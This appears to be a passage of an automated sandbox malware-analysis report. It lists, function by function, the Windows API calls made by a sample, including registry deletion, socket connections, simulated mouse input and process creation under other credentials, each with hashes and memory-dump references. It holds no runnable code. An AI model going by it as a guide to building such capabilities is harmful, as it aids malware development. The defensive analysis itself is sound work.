                                                            • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                                            • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                                              • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                                              • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                                              • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                            • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                                                            • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                            • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                                            • GetWindowLongW.USER32(00D655A0,000000F0), ref: 0048631F
                                                            • GetWindowLongW.USER32(00D655A0,000000F0), ref: 00486354
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                            • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                                                            • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                            • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                                            APIs
                                                              • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000), ref: 00477DB6
                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 004761C6
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                                            • WSAGetLastError.WSOCK32 ref: 00476221
                                                            • closesocket.WSOCK32(00000000), ref: 0047624A
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                            • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                                            • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                            • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                                            APIs
                                                              • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                              • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                              • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                            • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                                                            • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                            • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
                                                            APIs
                                                              • Part of subcall function 00B931DA: _free.LIBCMT ref: 00B93203
                                                            • _free.LIBCMT ref: 00B93264
                                                              • Part of subcall function 00B92096: HeapFree.KERNEL32(00000000,00000000,?,00B93208,?,00000000,?,00000000,?,00B9322F,?,00000007,?,?,00B92697,?), ref: 00B920AC
                                                              • Part of subcall function 00B92096: GetLastError.KERNEL32(?,?,00B93208,?,00000000,?,00000000,?,00B9322F,?,00000007,?,?,00B92697,?,?), ref: 00B920BE
                                                            • _free.LIBCMT ref: 00B9326F
                                                            • _free.LIBCMT ref: 00B9327A
                                                            • _free.LIBCMT ref: 00B932CE
                                                            • _free.LIBCMT ref: 00B932D9
                                                            • _free.LIBCMT ref: 00B932E4
                                                            • _free.LIBCMT ref: 00B932EF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                            • Instruction ID: fb60e2604349701042cb51899dc5ae44fd5e25cd005088b866d43340eed31fc9
                                                            • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                            • Instruction Fuzzy Hash: 8D111F72A40B14BADD30FBB0CC07FCB77DCAF05B40F404875BAAE76062DA65B6048661
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                                            • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                                            • EncodePointer.KERNEL32(00000000), ref: 00424097
                                                            • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                            • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                                            • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                            • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00B9473A,?,?,00000000), ref: 00B94543
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00B9473A,?,?,00000000,?,?,?), ref: 00B945C9
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B946C3
                                                            • __freea.LIBCMT ref: 00B946D0
                                                              • Part of subcall function 00B932FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B9332C
                                                            • __freea.LIBCMT ref: 00B946D9
                                                            • __freea.LIBCMT ref: 00B946FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 4b1ef4392fca1989b850421b5eb2eefc67c3ba62f7f8313d8990412a061d611c
                                                            • Instruction ID: a2411b458c2717b84d453d29da90d756c926eead731c03a7421c7d95efc8f2dd
                                                            • Opcode Fuzzy Hash: 4b1ef4392fca1989b850421b5eb2eefc67c3ba62f7f8313d8990412a061d611c
                                                            • Instruction Fuzzy Hash: 7951DEB2600216AFDF258FA4CC81EAB7BE9EB46750B1542F9F804D7190EB74DC52D6A0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: b5667a58d8b30e36736d260972df2e3e7fbb4f6b60a61dc2730759adb4cd8b3c
                                                            • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                                            • Opcode Fuzzy Hash: b5667a58d8b30e36736d260972df2e3e7fbb4f6b60a61dc2730759adb4cd8b3c
                                                            • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                                            APIs
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                              • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: 5065d1546826f33e87a4f6a47678ceea05cbf0e3f6973dffb5284f2505e3af75
                                                            • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                                            • Opcode Fuzzy Hash: 5065d1546826f33e87a4f6a47678ceea05cbf0e3f6973dffb5284f2505e3af75
                                                            • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0045EF06
                                                            • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                                                            • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                                                            • _memmove.LIBCMT ref: 0045EFFD
                                                            • VariantClear.OLEAUT32(?), ref: 0045F04A
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                            • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                                                            • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                            • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                                                            APIs
                                                            • _memset.LIBCMT ref: 00462258
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                                                            • IsMenu.USER32(00000000), ref: 004622C3
                                                            • CreatePopupMenu.USER32 ref: 004622F7
                                                            • GetMenuItemCount.USER32(000000FF), ref: 00462355
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                            • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                                                            • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                            • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                                                              • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                                                            • GetDesktopWindow.USER32 ref: 004770D6
                                                            • GetWindowRect.USER32(00000000), ref: 004770DD
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                                                              • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                            • GetCursorPos.USER32(?), ref: 0047713B
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                            • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                                                            • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                            • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                                                            APIs
                                                              • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                              • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                              • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                              • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                              • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                            • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                                                            • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                                                            • HeapFree.KERNEL32(00000000), ref: 00458911
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                            • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                                                            • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                            • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                                                            • CloseHandle.KERNEL32(00000004), ref: 00458603
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
